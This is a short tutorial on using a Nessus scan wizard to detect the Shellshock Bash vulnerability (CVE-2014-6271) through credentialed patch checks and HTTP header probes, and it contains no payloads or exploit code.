Shellshock Vulnerability Scanning – Nessus
Nessus, the most popular vulnerability scanner that scan the IT infrastructure to find the possible vulnerabilities in the network. Nessus can also be integrated with Nmap and metasploit, the integration result a finest tool that can perform vulnerability scanning + exploitation = a complete penetration testing environment. OpenVAS is the competitor of nessus and both tools have their own merits and demerits, but at this time; the objective is to make Unix/MAC operating systems secure from the “Shellshock”.
What Is ShellShock Bug ?
ShellShock, a vulnerability bigger than HeartBleed Bug; it is affecting Linux and Mac OS X software. Dubbed Shellshock, or the Bash Bug, the security vulnerability is officially known as CVE-2014-6271 and affects the Bash command processor which is used in most Linux distributions, in Apple's Mac OS X, and the Apache web server software, among others.
Users running Linux and Mac OS X on their PCs are at risk, but it is thought that the most likely target will be web servers running the Apache web server software.
How to scan for the "shellshock" vulnerability ?
ShellShock is in bash, but can be exploited remotely in a number of ways (via HTTP or other means). Tenable has released a handful of plugins to do patch checks, to test the vulnerability via SSH via an authenticated scan, and to test for the vulnerability via HTTP(s). In order to speed up the audit, we've released a wizard for this.
To use it, update your plugin feed (makes sure you're running the plugin set 201409251325 or newer. Then go to Policies -> Create a new policy, and you'll notice the new shellshock wizard:
Click on it and follow the instructions. You'll have the option to enter your SSH credentials, but you can just as well perform a fully unauthenticated scan to only target HTTP. Once this is set, create a new scan and use this policy. Hopefully, you will not see an output such as:
What does this wizard do?
This wizard creates a very narrow scan policy that will perform a quick port scan (or slower, if you ask for a "thorough" scan) to identify the remote HTTP and SSH servers. Then, it will:
- Log into every host (if you provided credentials) and will make sure that the vendor-supplied patches are installed ;
- For good measure, it will also use the opportunity of being logged in to directly check bash itself, so that if your vendor did not provide patches, or if you're scanning an unsupported system, Nessus will still catch the flaw ;
- If a web server is running, Nessus will crawl it while setting a malformed User-Agent, Cookie and Referer field to try to exploit the vulnerability using this attack vector ;